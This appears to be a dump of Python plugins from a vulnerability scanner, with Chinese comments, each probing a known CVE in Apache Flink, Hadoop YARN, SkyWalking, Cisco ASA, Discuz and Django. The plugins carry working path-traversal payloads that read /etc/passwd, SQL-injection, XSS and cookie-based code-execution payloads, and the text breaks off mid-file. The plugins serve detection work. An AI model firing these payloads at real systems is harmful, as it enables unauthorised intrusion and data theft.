https://vulhub.org/#/environments/flink/CVE-2020-17519/ 8 | 9 | Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布) 10 | 允许攻击者通过JobManager进程的REST接口, 读取JobManager本地文件系统上的任意文件 11 | ''' 12 | 13 | from PluginManager import Vuln_Scan 14 | from lib.tool import check 15 | 16 | class Scan(Vuln_Scan): 17 | def __init__(self): 18 | self.payloads = [ 19 | {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, 20 | {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, 21 | {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, 22 | {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'}, 23 | {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'}, 24 | {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'} 25 | ] 26 | 27 | def POC(self, clients): 28 | client = clients.get('reqClient') 29 | 30 | vul_info = { 31 | 'app_name': 'ApacheFlink', 32 | 'vul_type': 'FileRead', 33 | 'vul_id': 'CVE-2020-17519', 34 | } 35 | 36 | for payload in self.payloads: 37 | path = payload['path'] 38 | 39 | res = client.request( 40 | 'get', 41 | path, 42 | vul_info=vul_info 43 | ) 44 | if res is None: 45 | continue 46 | 47 | if (check.check_res_fileread(res.text)): 48 | results = { 49 | 'Target': res.request.url, 50 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 51 | 'Request': res 52 | } 53 | return results 54 | return None 55 | 56 | def EXP(self, clients): 57 | pass 58 | 59 | def Start(self, clients): 60 | return self.POC(clients) 61 | -------------------------------------------------------------------------------- /payloads/ApacheHadoop/apache-hadoop-unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Hadoop YARN ResourceManager 未授权访问 6 | 暂无编号 7 | Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ 8 | 9 | YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, 10 | 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 11 | ''' 12 | 13 | from PluginManager import Vuln_Scan 14 | 15 | class Scan(Vuln_Scan): 16 | def __init__(self): 17 | self.payloads = [ 18 | {'path': ''}, 19 | {'path': 'cluster'}, 20 | {'path': 'cluster/cluster'}, 21 | {'path': 'cluster/nodes'}, 22 | {'path': 'cluster/nodelabels'}, 23 | {'path': 'cluster/apps'}, 24 | {'path': 'cluster/scheduler'}, 25 | ] 26 | 27 | def POC(self, clients): 28 | client = clients.get('reqClient') 29 | 30 | vul_info = { 31 | 'app_name': 'ApacheHadoop', 32 | 'vul_type': 'unAuthorized', 33 | 'vul_id': 'ApacheHadoop-unAuth', 34 | } 35 | 36 | for payload in self.payloads: 37 | path = payload['path'] 38 | 39 | res = client.request( 40 | 'get', 41 | path, 42 | vul_info=vul_info 43 | ) 44 | if res is None: 45 | continue 46 | 47 | if (( 48 | 'parseHadoopID' in res.text 49 | and 'renderHadoopDate' in res.text 50 | and 'parseHadoopProgress' in res.text) 51 | or ( 52 | 'src="/static/hadoop-st.png"' in res.text 53 | and 'href="/jmx?qry=Hadoop:*"' in res.text 54 | and 'org.apache.hadoop.yarn.server.resourcemanager' in res.text 55 | and 'Hadoop version' in res.text) 56 | or ( 57 | '' in res.text 58 | and 'Server metrics' in res.text) 59 | ): 60 | results = { 61 | 'Target': res.request.url, 62 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 63 | 'Exploit': 'https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py', 64 | 'Request': res 65 | } 66 | return results 67 | return None 68 | 69 | def EXP(self, clients): 70 | pass 71 | 72 | def Start(self, clients): 73 | return self.POC(clients) 74 | -------------------------------------------------------------------------------- /payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Apache SkyWalking是阿帕奇的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器 6 | SkyWalking SQL注入 7 | CVE-2020-9483 8 | Payload: https://vulhub.org/#/environments/skywalking/8.3.0-sqli/ 9 | 10 | 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中, 存在一处H2 Database SQL注入漏洞 11 | ''' 12 | 13 | from PluginManager import Vuln_Scan 14 | 15 | class Scan(Vuln_Scan): 16 | def __init__(self): 17 | self.payloads = [ 18 | { 19 | 'path': 'graphql', 20 | 'data': '''{"query":"query queryLogs($condition:LogQueryCondition){queryLogs(condition: $condition) {total logs {serviceId serviceName isError content}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}''' 21 | }, 22 | ] 23 | 24 | def POC(self, clients): 25 | client = clients.get('reqClient') 26 | 27 | vul_info = { 28 | 'app_name': 'ApacheSkyWalking', 29 | 'vul_type': 'SQLinject', 30 | 'vul_id': 'CVE-2020-9483', 31 | } 32 | 33 | headers = { 34 | 'Content-Type': 'application/json' 35 | } 36 | 37 | for payload in self.payloads: 38 | path = payload['path'] 39 | data = payload['data'] 40 | 41 | res = client.request( 42 | 'post', 43 | path, 44 | data=data, 45 | headers=headers, 46 | allow_redirects=False, 47 | vul_info=vul_info 48 | ) 49 | if res is None: 50 | continue 51 | 52 | if (('Exception while fetching data (/queryLogs) : Table \\"SQLI\\" not found' in res.text) 53 | and ('select 1 from sqli where 1=1' in res.text) 54 | ): 55 | results = { 56 | 'Target': res.request.url, 57 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 58 | 'Request': res 59 | } 60 | return results 61 | return None 62 | 63 | def EXP(self, clients): 64 | pass 65 | 66 | def Start(self, clients): 67 | return self.POC(clients) 68 | -------------------------------------------------------------------------------- /payloads/Cisco/cisco-cve-2020-3580-xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Cisco ASA设备/FTD设备 XSS跨站脚本攻击 6 | CVE-2020-3580 7 | 8 | Cisco ASA设备/FTD设备 XSS跨站脚本攻击 (反射型) 9 | ''' 10 | 11 | from lib.tool.md5 import random_md5 12 | from PluginManager import Vuln_Scan 13 | 14 | class Scan(Vuln_Scan): 15 | def __init__(self): 16 | self.payloads = [ 17 | { 18 | 'path': '+CSCOE+/saml/sp/acs?tgname=a', 19 | 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' 20 | }, 21 | { 22 | 'path': 'saml/sp/acs?tgname=a', 23 | 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' 24 | }, 25 | { 26 | 'path': 'sp/acs?tgname=a', 27 | 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' 28 | }, 29 | { 30 | 'path': 'acs?tgname=a', 31 | 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' 32 | } 33 | ] 34 | 35 | def POC(self, clients): 36 | client = clients.get('reqClient') 37 | 38 | vul_info = { 39 | 'app_name': 'Cisco', 40 | 'vul_type': 'XSS', 41 | 'vul_id': 'CVE-2020-3580', 42 | } 43 | 44 | for payload in self.payloads: # * Payload 45 | random_str = random_md5(8) 46 | 47 | path = payload['path'] # * Path 48 | data = payload['data'].format(TEXT=random_str) # * Data 49 | 50 | res = client.request( 51 | 'post', 52 | path, 53 | data=data, 54 | allow_redirects=False, 55 | vul_info=vul_info 56 | ) 57 | if res is None: 58 | continue 59 | 60 | if (("onload=confirm('" + random_str + "')") in res.text): 61 | results = { 62 | 'Target': res.request.url, 63 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 64 | 'Request': res 65 | } 66 | return results 67 | return None 68 | 69 | def EXP(self, clients): 70 | pass 71 | 72 | def Start(self, clients): 73 | return self.POC(clients) 74 | -------------------------------------------------------------------------------- /payloads/Discuz/discuz-wooyun-2010-080723-rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com 6 | Discuz 全局变量防御绕过导致代码执行 7 | wooyun-2010-080723 8 | Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/ 9 | 10 | 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 11 | 导致$_REQUEST中不再包含$_COOKIE, 12 | 我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。 13 | ''' 14 | 15 | from lib.tool.md5 import random_int_1 16 | from lib.tool import check 17 | from PluginManager import Vuln_Scan 18 | 19 | class Scan(Vuln_Scan): 20 | def __init__(self): 21 | self.payloads = [ 22 | { 23 | 'path': 'viewthread.php?tid=10&extra=page%3D1', 24 | 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} 25 | }, 26 | { 27 | 'path': '?tid=10&extra=page%3D1', 28 | 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} 29 | }, 30 | { 31 | 'path': '', 32 | 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} 33 | }, 34 | ] 35 | 36 | def POC(self, clients): 37 | client = clients.get('reqClient') 38 | 39 | vul_info = { 40 | 'app_name': 'Discuz', 41 | 'vul_type': 'RCE', 42 | 'vul_id': 'wooyun-2010-080723', 43 | } 44 | 45 | for payload in self.payloads: 46 | random_str = str(random_int_1(6)) 47 | RCEcommand = 'print_r(' + random_str + ')' 48 | 49 | path = payload['path'] 50 | headers = payload['headers'] 51 | headers['Cookie'] = headers['Cookie'].format(RCECOMMAND=RCEcommand) 52 | 53 | res = client.request( 54 | 'get', 55 | path, 56 | headers=headers, 57 | allow_redirects=False, 58 | vul_info=vul_info 59 | ) 60 | if res is None: 61 | continue 62 | 63 | if (check.check_res(res.text, random_str, 'print_r')): 64 | results = { 65 | 'Target': res.request.url, 66 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 67 | 'Request': res 68 | } 69 | return results 70 | return None 71 | 72 | def EXP(self, clients): 73 | pass 74 | 75 | def Start(self, clients): 76 | return self.POC(clients) 77 | -------------------------------------------------------------------------------- /payloads/Django/django-cve-2017-12794-xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Django debug page XSS漏洞 6 | CVE-2017-12794 7 | Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/ 8 | 9 | Django debug page XSS漏洞 10 | 构造url创建新用户, 同时拼接xss语句, 得到已创建的提示; 11 | 此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码 12 | ''' 13 | 14 | from payloads.Django.tool_get_urlconf import get_urlconf 15 | from lib.tool.md5 import random_md5 16 | from PluginManager import Vuln_Scan 17 | 18 | class Scan(Vuln_Scan): 19 | def __init__(self): 20 | self.payloads = [ 21 | {'path': '{URLCONF}/?username='}, 22 | # {'path': 'create_user/?username='}, 23 | # {'path': '?username='}, 24 | ] 25 | 26 | def POC(self, clients): 27 | client = clients.get('reqClient') 28 | 29 | vul_info = { 30 | 'app_name': 'Django', 31 | 'vul_type': 'XSS', 32 | 'vul_id': 'CVE-2017-12794', 33 | } 34 | 35 | urlConfList = get_urlconf(client, vul_info) # * 获取Django定义的URL路径 36 | if not urlConfList: 37 | return None 38 | 39 | for payload in self.payloads: # * Payload 40 | for urlConf in urlConfList: 41 | random_str = random_md5(5) # * 随机5位字符串 42 | 43 | path = payload['path'].format(URLCONF=urlConf, TEXT=random_str) # * Path 44 | 45 | res1 = client.request( 46 | 'get', 47 | path, 48 | vul_info=vul_info 49 | ) 50 | if res1 is None: 51 | continue 52 | 53 | # * 该XSS漏洞的特性, 需要请求2次, 2次的payload必须一模一样 54 | res2 = client.request( 55 | 'get', 56 | path, 57 | vul_info=vul_info 58 | ) 59 | if res2 is None: 60 | continue 61 | 62 | text_1 = "